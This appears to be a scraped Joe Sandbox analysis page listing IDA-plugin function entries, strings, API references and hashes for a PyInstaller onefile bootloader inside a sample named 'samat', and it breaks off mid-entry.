Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
API String ID: 3832162212-3165540532
Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
Instruction ID: eba343eb55c1bcdafe6450e80ed1054b3ccd7343653f69bfcc94d6bd62d1b3b5
Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
Instruction Fuzzy Hash: C8D17232B08A8286E711AF34EC563A9B768FF84758F808237DA5D87A94DFBCD144C711

Function 00007FF7E12C1000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 511
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF7E12C3D35
PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF7E12C3882, 00007FF7E12C38AF
Failed to start splash screen!, xrefs: 00007FF7E12C3ED4
_PYI_ARCHIVE_FILE, xrefs: 00007FF7E12C38D2, 00007FF7E12C39FF
Failed to convert DLL search path!, xrefs: 00007FF7E12C3DDC
_PYI_SPLASH_IPC, xrefs: 00007FF7E12C3A23, 00007FF7E12C3EF5
_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF7E12C3A17, 00007FF7E12C3A2F, 00007FF7E12C3A9B
_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF7E12C3A0B, 00007FF7E12C3CD4, 00007FF7E12C3F6B
VCRUNTIME140.dll, xrefs: 00007FF7E12C3DB1
Failed to remove temporary directory: %s, xrefs: 00007FF7E12C3FCF
Py_GIL_DISABLED, xrefs: 00007FF7E12C3AF4
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF7E12C3EA6
pyi-runtime-tmpdir, xrefs: 00007FF7E12C3B68
Failed to load splash screen resources!, xrefs: 00007FF7E12C3E85
PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF7E12C3E0A
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF7E12C3C61
Could not create temporary directory!, xrefs: 00007FF7E12C3CBF
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF7E12C3D12
MEI, xrefs: 00007FF7E12C3933
pyi-python-flag, xrefs: 00007FF7E12C3AD6
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF7E12C3971
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF7E12C3BE8
pkg, xrefs: 00007FF7E12C39BE
pyi-contents-directory, xrefs: 00007FF7E12C3B8D
Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF7E12C3B32
pyi-disable-windowed-traceback, xrefs: 00007FF7E12C3BB2
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF7E12C39DE
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF7E12C3EBB

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
API String ID: 2776309574-4232158417
Opcode ID: 824ed701c3c560fed3adc96ede838a2023945a6ada8c955277e175104ca074ca
Instruction ID: 4d2c99a9177edecaaa5b682b82325fcd493c8c40b473d9cd541dac168e12def1
Opcode Fuzzy Hash: 824ed701c3c560fed3adc96ede838a2023945a6ada8c955277e175104ca074ca
Instruction Fuzzy Hash: 5D325C21B0868291FB19F725DC563F9A669AF44780FC48433DB5D822D6EFBCE558C322

Function 00007FF7E12E5C00 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF7E12E5C45

Part of subcall function 00007FF7E12E5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E55AC

Part of subcall function 00007FF7E12DA948: RtlFreeHeap.NTDLL(?,?,?,00007FF7E12E2D22,?,?,?,00007FF7E12E2D5F,?,?,00000000,00007FF7E12E3225,?,?,?,00007FF7E12E3157), ref: 00007FF7E12DA95E
Part of subcall function 00007FF7E12DA948: GetLastError.KERNEL32(?,?,?,00007FF7E12E2D22,?,?,?,00007FF7E12E2D5F,?,?,00000000,00007FF7E12E3225,?,?,?,00007FF7E12E3157), ref: 00007FF7E12DA968

Part of subcall function 00007FF7E12DA900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7E12DA8DF,?,?,?,?,?,00007FF7E12DA7CA), ref: 00007FF7E12DA909
Part of subcall function 00007FF7E12DA900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7E12DA8DF,?,?,?,?,?,00007FF7E12DA7CA), ref: 00007FF7E12DA92E

_get_daylight.LIBCMT ref: 00007FF7E12E5C34

Part of subcall function 00007FF7E12E55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E560C

_get_daylight.LIBCMT ref: 00007FF7E12E5EAA
_get_daylight.LIBCMT ref: 00007FF7E12E5EBB
_get_daylight.LIBCMT ref: 00007FF7E12E5ECC
GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7E12E610C), ref: 00007FF7E12E5EF3

Strings

Eastern Standard Time, xrefs: 00007FF7E12E5F99
Eastern Summer Time, xrefs: 00007FF7E12E5FB1

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 4070488512-239921721
Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
Instruction ID: 0f0351766d532e8329fa7609a255cc26f3cec78aba50a6adecb84e9bc3bcff5f
Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
Instruction Fuzzy Hash: BFD1C26AB2824246E721BF31DC423B9E399EF54784FC4C137EA0E87695DEBCE4418761

Function 00007FF7E12E6964 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7E12E6698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E66D9
Part of subcall function 00007FF7E12E6698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E6757
Part of subcall function 00007FF7E12E6698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E67A8

CreateFileW.KERNELBASE ref: 00007FF7E12E6A6A
CreateFileW.KERNEL32 ref: 00007FF7E12E6ABA
GetLastError.KERNEL32 ref: 00007FF7E12E6AEA
GetFileType.KERNELBASE ref: 00007FF7E12E6AFF
GetLastError.KERNEL32 ref: 00007FF7E12E6B09
CloseHandle.KERNEL32 ref: 00007FF7E12E6B3C
CloseHandle.KERNEL32 ref: 00007FF7E12E6C9F
CreateFileW.KERNEL32 ref: 00007FF7E12E6CD4
GetLastError.KERNEL32 ref: 00007FF7E12E6CE3

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
Instruction ID: fa1b00118abf8c3beb5864411022a9176577bd252dcd7c31b3930ecdedd5bb51
Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
Instruction Fuzzy Hash: 79C1F333B28A4285EB11DFA5C8823AC7765F749B98F81423ADE2E97794CF79E051C311

Function 00007FF7E12C83C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,00007FF7E12C8919,00007FF7E12C3FA5), ref: 00007FF7E12C842B
RemoveDirectoryW.KERNEL32(?,00007FF7E12C8919,00007FF7E12C3FA5), ref: 00007FF7E12C84AE
DeleteFileW.KERNELBASE(?,00007FF7E12C8919,00007FF7E12C3FA5), ref: 00007FF7E12C84CD
FindNextFileW.KERNELBASE(?,00007FF7E12C8919,00007FF7E12C3FA5), ref: 00007FF7E12C84DB
FindClose.KERNEL32(?,00007FF7E12C8919,00007FF7E12C3FA5), ref: 00007FF7E12C84EC
RemoveDirectoryW.KERNELBASE(?,00007FF7E12C8919,00007FF7E12C3FA5), ref: 00007FF7E12C84F5

Strings

%s\*, xrefs: 00007FF7E12C83F2

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
Instruction ID: be77b914b5352e0c1d764396ffd378e90c9967b9c534c40af67204c626d5dd18
Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
Instruction Fuzzy Hash: 59418221B0C94285EB30AB10EC463BAE369FB94754FC18237D69D83694EFBCD585C762

Function 00007FF7E12E5E7C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF7E12E5EAA

Part of subcall function 00007FF7E12E55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E560C

_get_daylight.LIBCMT ref: 00007FF7E12E5EBB

Part of subcall function 00007FF7E12E5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E55AC

_get_daylight.LIBCMT ref: 00007FF7E12E5ECC

Part of subcall function 00007FF7E12E55C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E55DC

Part of subcall function 00007FF7E12DA948: RtlFreeHeap.NTDLL(?,?,?,00007FF7E12E2D22,?,?,?,00007FF7E12E2D5F,?,?,00000000,00007FF7E12E3225,?,?,?,00007FF7E12E3157), ref: 00007FF7E12DA95E
Part of subcall function 00007FF7E12DA948: GetLastError.KERNEL32(?,?,?,00007FF7E12E2D22,?,?,?,00007FF7E12E2D5F,?,?,00000000,00007FF7E12E3225,?,?,?,00007FF7E12E3157), ref: 00007FF7E12DA968

GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7E12E610C), ref: 00007FF7E12E5EF3

Strings

Eastern Standard Time, xrefs: 00007FF7E12E5F99
Eastern Summer Time, xrefs: 00007FF7E12E5FB1

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 3458911817-239921721
Opcode ID: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
Instruction ID: ec6905452d3a93276458e62181b3dfd23d87d646b480793fcc8ea68b0a1b986e
Opcode Fuzzy Hash: 6f2171165b001c2744b9d494c76d2a7753c36df5ed5d67f3075860c83c0dbe14
Instruction Fuzzy Hash: 0C519276B1864246E711FF31DC826A9E769FB58784FC0813BEA0E83695DFBCE4008761

Function 00007FF7E12C9280 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF7E12C92B3
FindClose.KERNELBASE ref: 00007FF7E12C92C2

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
Instruction ID: 303cc4c16ec65fcddf93b7d255406e535a04841912aebca1591233be52101179
Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
Instruction Fuzzy Hash: F6F0C822B1878186FB609B60B88A766B354BB84375F840337DAAE12AD4DF7CD059CA05

Function 00007FF7E12E08C8 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: 237fa8d459c5d11eae1bba494416b753c006fbba9c027a8b8839988129060696
Instruction ID: 3c3de33cbddb719382c129076176a23241c35528fba36232b48b9a2c44c46970
Opcode Fuzzy Hash: 237fa8d459c5d11eae1bba494416b753c006fbba9c027a8b8839988129060696
Instruction Fuzzy Hash: 6102C721B1D64641FB62BB119C0337DA688AF41BA0FD58637ED5D8A3D1DEFCA4128336

Function 00007FF7E12C1950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7E12C7F90: _fread_nolock.LIBCMT ref: 00007FF7E12C803A

_fread_nolock.LIBCMT ref: 00007FF7E12C1A1B

Part of subcall function 00007FF7E12C2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7E12C1B6A), ref: 00007FF7E12C295E

Strings

Error on file., xrefs: 00007FF7E12C1B8D
calloc, xrefs: 00007FF7E12C1A68
MEI, xrefs: 00007FF7E12C1991
fread, xrefs: 00007FF7E12C1A32, 00007FF7E12C1B5C
Failed to read cookie!, xrefs: 00007FF7E12C1A2B
Failed to seek to cookie position!, xrefs: 00007FF7E12C19EE
Could not allocate memory for archive structure!, xrefs: 00007FF7E12C1A61
Could not allocate buffer for TOC!, xrefs: 00007FF7E12C1B1B
Could not read full TOC!, xrefs: 00007FF7E12C1B55
fseek, xrefs: 00007FF7E12C19F5
malloc, xrefs: 00007FF7E12C1B22

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: 366ee5d3afceab38ba1fccf279b745a5e3150e0a5f226ca546ddb68d3ae287d0
Instruction ID: 099d9a3fd213d9c3470f2c5f8372f798258e2db17362bb36acf9110826a5232a
Opcode Fuzzy Hash: 366ee5d3afceab38ba1fccf279b745a5e3150e0a5f226ca546ddb68d3ae287d0
Instruction Fuzzy Hash: 46819171B08682C6EB11EB14D8433F9A398AF48784FC08433EA8D87795DEBCE545D762

Function 00007FF7E12C1600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to write data chunk!, xrefs: 00007FF7E12C17CA
Failed to create symbolic link %s!, xrefs: 00007FF7E12C1622
fread, xrefs: 00007FF7E12C17E6
fwrite, xrefs: 00007FF7E12C17D1
fopen, xrefs: 00007FF7E12C1663
Failed to extract %s: failed to open target file!, xrefs: 00007FF7E12C165C
Failed to extract %s: failed to open archive file!, xrefs: 00007FF7E12C16A2
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF7E12C1742
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7E12C16DA
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7E12C17DF
fseek, xrefs: 00007FF7E12C16E1
malloc, xrefs: 00007FF7E12C1749

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2050909247-1550345328
Opcode ID: 4ba9704c2667ef3387b8ad085b4ce1cd9035ff509126d6a3bfbf4b4a2ffdb3da
Instruction ID: 30411cdfb76d1865e385ef329db9a896927d2b266610695e4e2daec76b7fc569
Opcode Fuzzy Hash: 4ba9704c2667ef3387b8ad085b4ce1cd9035ff509126d6a3bfbf4b4a2ffdb3da
Instruction Fuzzy Hash: FD51AE21B0864386EB15BB119C033AAA358BF84794FD44533EE4C47BA6DFBDE544D722

Function 00007FF7E12C8660 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(?,?,00000000,00007FF7E12C3CBB), ref: 00007FF7E12C8704
GetCurrentProcessId.KERNEL32(?,00000000,00007FF7E12C3CBB), ref: 00007FF7E12C870A
CreateDirectoryW.KERNELBASE(?,00000000,00007FF7E12C3CBB), ref: 00007FF7E12C874C

Part of subcall function 00007FF7E12C8830: GetEnvironmentVariableW.KERNEL32(00007FF7E12C388E), ref: 00007FF7E12C8867
Part of subcall function 00007FF7E12C8830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7E12C8889

Part of subcall function 00007FF7E12D8238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D8251

Part of subcall function 00007FF7E12C2810: MessageBoxW.USER32 ref: 00007FF7E12C28EA

Strings

TMP, xrefs: 00007FF7E12C869C, 00007FF7E12C87A3
TMP, xrefs: 00007FF7E12C86C2
LOADER: failed to set the TMP environment variable., xrefs: 00007FF7E12C86DC
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF7E12C877E
_MEI%d, xrefs: 00007FF7E12C8712

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 3563477958-1339014028
Opcode ID: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
Instruction ID: b0f671e3da96fe24b91e5f5725e33ce6cb05d2544f8ab813874516cf45b85df0
Opcode Fuzzy Hash: 191653d34e5a06968e8282251bef030903df87164e49fe651f79a53b4d97858f
Instruction Fuzzy Hash: 6441A312B1964245FB15F725AC5B3BA9258AF847C4FC18133EE0D477D6EEBCE445C222

Function 00007FF7E12C1210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF7E12C12BA
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF7E12C1276
1.3.1, xrefs: 00007FF7E12C1249
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF7E12C12EF
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF7E12C141E
malloc, xrefs: 00007FF7E12C12C1, 00007FF7E12C12F6

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: 8c3d3767c92c3f25500c132f33d9ae5f36ceff73d91df2c2d10727b506476509
Instruction ID: 853aabfe5072ced9c79ec08722657eb072b097d7335e90c100d5baa31dfaff51
Opcode Fuzzy Hash: 8c3d3767c92c3f25500c132f33d9ae5f36ceff73d91df2c2d10727b506476509
Instruction Fuzzy Hash: A451C422B0868285E720BB11EC423BAE298FF85794FD44133EE4D47B95EEBCE441D712

Function 00007FF7E12DED10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

